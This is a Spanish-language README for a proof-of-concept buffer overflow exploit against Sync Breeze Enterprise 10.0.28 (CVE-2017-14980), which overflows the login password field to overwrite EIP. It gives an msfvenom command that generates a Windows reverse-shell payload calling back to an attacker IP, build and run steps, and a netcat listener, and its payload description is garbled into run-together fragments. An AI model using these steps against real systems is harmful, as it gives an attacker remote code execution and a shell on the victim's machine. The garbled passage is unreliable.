
Exploit de desbordamiento de búfer de prueba de concepto para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envía un payload HTTP POST manipulado para sobrescribir EIP y ejecutar shellcode x86 personalizado para ejecución arbitraria de código.
Este repositorio contiene un exploit de desbordamiento de búfer (BOF) de prueba de concepto para Sync Breeze Enterprise versión 10.0.28, dirigido a la vulnerabilidad identificada como CVE-2017-14980.
La vulnerabilidad existe debido a una validación de entrada inadecuada al procesar el campo password en una solicitud POST al endpoint /login.
Un atacante puede enviar un valor excesivamente largo en este campo, lo que sobrescribe el EIP y permite la ejecución de código arbitrario.
Este exploit envía una carga útil cuidadosamente elaborada que consta de:
'A')password.gcc)\x83\x0C\x09\x10) y del shellcode si es necesarioEjemplo de generación de shellcode con msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444